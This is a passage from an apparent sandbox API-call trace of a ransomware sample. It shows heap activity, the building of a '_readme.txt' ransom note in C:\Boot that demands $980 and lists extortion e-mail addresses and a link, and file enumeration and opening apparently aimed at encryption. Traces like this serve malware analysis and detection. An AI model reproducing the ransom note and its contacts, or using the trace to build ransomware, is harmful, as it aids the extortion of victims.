returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.438] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.438] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.438] PathFindFileNameW (pszPath="") returned="" [0201.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.438] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.438] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x336f4d0 [0201.438] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b65058 [0201.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.439] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x336f4d0 [0201.457] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0201.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.457] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0201.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.457] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.457] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.457] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.458] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.458] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.458] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x475e1b60, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x475e1b60, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0201.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.458] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0201.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.458] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x4724fa60, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0201.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.458] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0201.459] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.459] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0201.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.459] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0201.459] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0201.459] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0201.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) 